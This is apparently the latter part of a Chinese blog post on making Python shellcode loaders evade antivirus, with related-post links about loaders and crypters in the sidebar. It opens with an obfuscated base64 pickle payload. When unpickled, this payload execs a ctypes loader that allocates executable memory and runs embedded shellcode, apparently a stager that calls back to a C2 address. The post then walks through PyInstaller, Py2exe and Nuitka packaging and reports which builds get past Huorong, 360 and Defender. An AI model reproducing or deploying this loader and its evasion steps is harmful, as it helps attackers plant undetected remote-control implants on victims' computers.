shellcode=b'gASV4AUAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFjBBQAACmltcG9ydCBjdHlwZXMKaW1wb3J0IGJhc2U2NAoKZW5jb2RlX3NoZWxsY29kZSA9IGInL09pSkFBQUFZSW5sTWRKa2kxSXdpMUlNaTFJVWkzSW9EN2RLSmpIL01jQ3NQR0Y4QWl3Z3djOE5BY2ZpOEZKWGkxSVFpMEk4QWRDTFFIaUZ3SFJLQWRCUWkwZ1lpMWdnQWRQalBFbUxOSXNCMWpIL01jQ3N3YzhOQWNjNDRIWDBBMzM0TzMwa2RlSllpMWdrQWRObWl3eExpMWdjQWRPTEJJc0IwSWxFSkNSYlcyRlpXbEgvNEZoZldvc1M2NFpkYUc1bGRBQm9kMmx1YVZSb1RIY21CLy9WTWY5WFYxZFhWMmc2Vm5tbi85WHBoQUFBQUZzeHlWRlJhZ05SVVdoUUFBQUFVMUJvVjRtZnh2L1Y2M0JiTWRKU2FBQUNRSVJTVWxKVFVsQm82MVV1Ty8vVmljYUR3MUF4LzFkWGF2OVRWbWd0QmhoNy85V0Z3QStFd3dFQUFESC9oZlowQkluNTZ3bG9xc1hpWGYvVmljRm9SU0ZlTWYvVk1mOVhhZ2RSVmxCb3QxZmdDLy9WdndBdkFBQTV4M1MzTWYvcGtRRUFBT25KQVFBQTZJdi8vLzh2UmsxNFVRQnVpQmFWYy8zVGppNnJrUXA3UHBZa1Nwa0x3a2RmNGVPRmIxTVNuTmxpcVpkV0ZiSmxLNzJicEtlc2lTQldIUnRRRVJMU2RIYVlKd3NXN3EzS1IyTmhYanRSUlZsUktVYnZBRlZ6WlhJdFFXZGxiblE2SUUxdmVtbHNiR0V2TkM0d0lDaGpiMjF3WVhScFlteGxPeUJOVTBsRklEZ3VNRHNnVjJsdVpHOTNjeUJPVkNBMkxqQTdJRlJ5YVdSbGJuUXZOQzR3S1EwS0FHMTI4ZEF4UmtrbWVUTFYzU3FKNXNKVTY2MnpUWlMwRjhqU3ArTEVpNVNQYzJHQlhxc2lDV3ZPVjBKd3lOQ3AzaTB2Q1RPa2NNdHdyVG1kY05yRU5hOHplSGN6QzlRWnNkd29Fa1JTNVgrZ0k4ZmJMa2FVakg2WUo5U3I0SW96VGpkbjBNQ1RNUXBDbkUyNVdYVmN3NFNKdjR1V0dQSGdXSmZ0TS82SjlKSm1RRlZiN1hwU1hlL25iN3NZSnhQNVFWNzNTZ3IxblFSdlNjRmZiNlIvRFhuaGJhVlM1Qy9Jbjd5V1N2TW0zMjcrbGZmeWlXUlF5MXFpK1Z3V204M0xjeEc1VHFaZmJCOHlocWZpZzR5M0lMaCtIdXR3MjFaVnA5QVdOYlNwa1F4UzdRQm84TFdpVnYvVmFrQm9BQkFBQUdnQUFFQUFWMmhZcEZQbC85V1R1UUFBQUFBQjJWRlRpZWRYYUFBZ0FBQlRWbWdTbG9uaS85V0Z3SFRHaXdjQnc0WEFkZVZZdytpcC9mLy9NVGt5TGpFMk9DNHlNeTR4TWpnQUFBR0dvQT09JwpzaGVsbGNvZGUgPSBiYXNlNjQuYjY0ZGVjb2RlKGVuY29kZV9zaGVsbGNvZGUpCnJ3eHBhZ2UgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYygwLCBsZW4oc2hlbGxjb2RlKSwgMHgxMDAwLCAweDQwKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkocnd4cGFnZSwgY3R5cGVzLmNyZWF0ZV9zdHJpbmdfYnVmZmVyKHNoZWxsY29kZSksIGxlbihzaGVsbGNvZGUpKQpoYW5kbGUgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLkNyZWF0ZVRocmVhZCgwLCAwLCByd3hwYWdlLCAwLCAwLCAwKQpjdHlwZXMud2luZGxsLmtlcm5lbDMyLldhaXRGb3JTaW5nbGVPYmplY3QoaGFuZGxlLCAtMSkKlIWUUpQu'
pickle.loads(base64.b64decode(shellcode))

再次成功上线

image-20240214212652902

打包器

如果只是py文件的话,我们在实战中可能遇到没有python环境,所以需要打包python解析器

Pyinstaller&Py2exe&Nuitka

不同的打包器免杀性能不一样

Pyinstaller

一般是python只带的可以到python环境找一下

如果没有可以win+R然后运行以下代码

pip install pyinstaller -i https://pypi.tuna.tsinghua.edu.cn/simple/
​
pip install pyinstaller(这个是看安装在哪了)

常用打包参数(示例)

常用参数 含义 -i 或 -icon 生成icon -F 创建一个绑定的可执行文件 -w 使用窗口,无控制台 -C 使用控制台,无窗口 -D 创建一个包含可执行文件的单文件夹包(默认情况下) -n 文件名

接下来对上面说的三种加密进行打包,看看免杀情况

在pyinstaller.exe文件目录下运行

pyinstaller.exe -F 1.py

可执行文件在该目录下的dist文件里,直接运行

先试了base64编码,但是直接火绒、360、Defender杀了

image-20240214220425190

换aes试试,还是火绒/360报毒,但是defender过了

最后看看反序列化可以绕过火绒/360

image-20240214221603516

Py2exe

首先安装Py2exe

pip install py2exe

然后再有setup.py的目录下运行

image-20240216142737074

setup.py文件

主要改这俩个位置(py的文件名)

image-20240216142959138

然后再在setup.py目录下运行

python setup.py py2exe

先base64,可以过掉火绒,过不了defender/360

aes的可以过火绒/defender,过不了360

反序列化可以过掉火绒/defender,过不了360

Nuitka

安装比较麻烦

先安装gcc

然后再输入cmd

pip install nuitka

运行脚本

nuitka 1.py

先base64,可以过掉火绒,过不了defender/360

aes的可以过火绒/defender/360

反序列化可以过掉火绒/defender/360

小小邵同学
关注
  • 22
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Njrat实例2
04-23
Njrat实例2
python打包的exe如何_通过Python实现Payload分离过程详解
weixin_39741101的博客
11-26 198
缺点:编译成exe以后体积过大实现:msf生成shellcode代码:将payload给copy下来,去除引号。\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33\x49\x6f\x44\x37\x64\x4b...
python打包的exe如何_CS强化_python
weixin_39947314的博客
11-26 620
CS作为主流红队工具,其在后渗透中的地位自不用说,功能强大,但如何让它活下去就成了个人发挥的内容,今天我们以python payload为例展开。payload生成通过cs自动生成我们python payload:值得一提的是360、电脑管家等均为对该payload报毒,倒是Windows Defender觉得事情没那么简单,显然不装毒软件的PC是最难搞的23333,因为它会默认开启Window...
对抗-MSF\CS-shellcode进行base64编码,python调用执行
m0_62172162的博客
04-25 477
对抗-MSF\CS-shellcode进行base64编码,python调用执行
一款基于pythonshellcode加载器+源代码+文档说明
最新发布
12-01
## 工具浅析 - 远控条件触发防沙箱 - 花指令干扰 - loader和shellcode进行fernet加密 - 触发器混淆干扰特征码 - 自动刷新ico图片的md5,防止图标特征码被查 ## 用法 - 安装依赖 ``` pip install -r requirements.txt ``` - 填入信息并运行main.py ``` 将shellcode和即将生成的a.txt的url填入main.py shellcode=b'' url='' 例如: url='http://192.168.52.129/a.txt' dist目录下生成HipsMain.exe 执行exe前记得将a.txt放到填写的url指定位置 ``` **仅支持windows系统编译!** ## 测试 **过火绒** ![](picture/image-20231019203001783.png) **过defender** ![](picture/image-20231019204156899.png) **动态执行** ![image-20231020182032610](picture/image-20231020182032610.png) ## 日志信息 - 2023-10-23:360、火绒 动态静态均可过,windows defender静态可过 - 2023-10-25:病毒库更新至最新的火绒和360动态可过,windows defender静态可过 - 2023-11-02:evilhiding v1.1更新,能绕过火绒,360,defender -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
python加载shellcode 简介
whatday的专栏
10-02 4283
前言 本文整理自小迪师傅近期课程以及本人实验时所踩的一些坑和思路。文章由浅入深,可以让你从小白到入门者,能够绕过火绒和360等国内主流安全软件,成功上线msf。本人也是刚接触,若有说得不对的地方,欢迎大佬们及时提出指正。关于本人在实验过程中所踩的一些坑会在文中提醒大家,让大家尽量少入坑。 注:以下实验截图均为本人发稿时重新测试所截 0X00 基础概念 1. python ctypes模块介绍 ctypes是 Python的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 D...
python基础之shellcode调用
dzqxwzoe的博客
08-23 895
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。shellcode常常使用机器语言编写。可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。(摘自百度)在windows中, 如果想要调用shellcode, 那肯定逃不过win32 api的调用, 如果会汇编的话那就另说了。那在这里介绍一下常用的API。函数需要查询MSDN去了解, 需要有点win32编程基础。
Encrypt(加密解密)
weixin_34378969的博客
10-22 1253
using System;using System.Security.Cryptography; using System.Text;using System.IO; public class Encrypt{ public Encrypt() { } #region MD5加密 /// <summary> /// MD5加密 /// &l...
pythonshellcode案例
kiihuang的博客
04-10 268
简单的病毒绕过,完成加壳操作。
shellCode技巧
qq_39330735的博客
05-15 2090
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对毒软件的⼀种⽅法,但是由于与⼿法的定义 有出⼊,所以如果将国内技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视 ,在类似于技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论技术,这为以后⽊⻢ 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
基于python pyd的shellcode绕过+源代码+文档说明
12-01
# DamnPythonEvasion 基于python pyd的方式。众所周知,python是一种解释型语言,通过pyinstaller打包后,可以提取出pyc文件然后可以通过反编译器得到源代码。 但是我们可以通过将py源文件通过Cpython编译成pyd文件,然后pyinstaller打包的时候动态链接即可。由于pyd是通过c代码编译而成的二进制文件,所以 要从pyd得到源代码几乎不可能,从而达到保护代码的目的。 # 测试环境 1. python3.8 64位 2. vs2019(Cpython编译时需要用到) 3. pyinstaller # 食用教程 ``` 1. 安装vs2019 python3 2. pip install pyinstaller 3. pip install cython 4. 修改 execute.py中的scbytes为你自己的shellcode 5. python setup.py build_ext --inplace 6. pyinstaller -F main.py -w --noupx ``` 现在如果一切顺利的话,你可以dist目录下找到打包好的main.exe文件 # 测试结果 根据目前的测试效果,可以绕过360和火绒。 -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
工具箱 简体中文版
02-24
辅助 ┍PE+ ┝MyCCL ┝MaskPE ┝冰枫文件防火墙 ┝AVFucker ┝AV Devil ┝ToPo ┝CodeCaver ┝Anti Kaspersky ┝TK.Loader ┝INSTDRV ┝DriverLoader ┝vmprotect ┕VBExplorer 保护壳 ┍BepGui ┝Cryptor ┝PolyBox ┝ASProtect ┝Punisher 汉化版 ┝ACStripper ┝PE加密 ┝Daemon Crypt ┝nsAnti CracKed ┝RPolyCrypt ┝Goat's PE Mutilator ┝Unknown Protect ┕EXE Stealth 压缩壳 ┍堀北压缩 ┝Minkecn ┝WinUpack ┝petgui_CHS ┝蚂蚁压缩工具 ┝超级加壳工具 ┝Nspack ┝FSG ┝GHF Protector ┝dePack ┝G!X Protector ┕eXPressor 花指令 ┍wrsky ┝防精灵 ┝花指令生成器 ┝超级加花器 ┝main ┝木马疫器 ┝上兴应用程序加壳 ┝冰枫文件加密器 ┝木马保护器 ┝8way ┝花指令添加器 ┝EXE Evil ┝木马彩衣 ┝F ake Ninja ┕━━━━━━━━━━━
30.远控专题(30)-Python加载shellcode-8种方式(VT率10-69)1
08-03
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!文章打包下载及相关软件下载: ht
Shellcode-Extractor:Python脚本从Linux可执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/二进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是费软件:您可以根据自由软件基金会发布的GNU通用公共许可证的条款(许可证的版本3)或(可选)任何更高版本来重新分发和/或修改它。 发行Shellcode-Extractor的目的是希望它会有用,但没有任何担保; 甚至没有对适销性或特定用途适用性的暗示保证。 有关更多详细信息,请参见GNU通用公共许可证。 您应该已经与该程序一起收到了GNU通用公共许可证的副本。 如果没有,请参阅 联系方式: 由于研究和研究原因而开发的工具,希望它会有用。 用法 编写汇编代码,生成目标文件,并在管道中使用此脚本到objdump
通过Python实现Payload分离过程详解
01-19
缺点: 编译成exe以后体积过大 实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33 \x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66 \x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x
Python shellcode
qq_25761407的博客
04-02 5428
Python shellcode
Python实现Shellcode加载器编写
m0_56187372的博客
12-11 965
利用python实现shellcode加载器的编写
方法(四)Pythonshellcode加载器
qq_56426046的博客
10-03 1163
方式 msfvenom生成raw格式的shellcode–>base64–>XOR–>AES将python代码缩小并混淆最后生成exe目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等。
2023最新使用python进行shellcode过360火绒 ,反虚拟机
weixin_47111262的博客
03-20 985
本源码仅供学习交流,不得用于违法范围,本源码已放到QQ交流群 群文件中QQ群:798134185。反虚拟机方案根据虚拟机系统文件 cpu核心数 开机启动时间 c盘大小判断。将加密的shellcode复制到shell.py中进行替换。生成c语言的payload使用encode.py进行加密。修改main.py的IP地址为c2服务器地址。使用pyinstaller进行打包。bypass火绒 360。python版本3.11。2023最新
python
09-11
Python是指在编写Python恶意代码时,通过一系列技术手段绕过毒软件的检测和阻止。在进行Python时,可以采取多种常用的静态技术,如特征码定位修改、填充花指令、文件加壳、内存执行、shellcode混淆、shellcode和loader分离、木马资源修改和调用系统白名单等。这些技术可以帮助我们在编写Python恶意代码时避毒软件检测到。 其中,特征码定位修改是指通过修改代码中的特征码或者特征码的位置,使得毒软件无法识别恶意代码。填充花指令是在代码中插入一些无实际功能的指令,以混淆代码结构,增加毒软件的分析难度。文件加壳是将恶意代码嵌入到其他可信的文件中,以绕过毒软件的检测。内存执行是将恶意代码直接加载到内存中执行,避了被毒软件静态检测的可能。shellcode混淆是通过对shellcode进行变形或加密,使其难以被毒软件识别。shellcode和loader分离是将shellcode和加载器分离,使得毒软件难以检测到完整的恶意代码。木马资源修改是通过修改恶意代码所依赖的资源文件或者库文件,绕过毒软件的检测。调用系统白名单是指利用操作系统的合法功能或者系统自带的程序来执行恶意代码,使其被认为是正常行为而不被毒软件拦截。 需要注意的是,不同语言的shellcode和loader在效果上有所差异,而Python中的效果相对较好。此外,选择小众语言和不同的exe打包器也可以提高效果。同时,在编写Python恶意代码时,尽量避使用敏感词汇,以降低被毒软件查的概率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值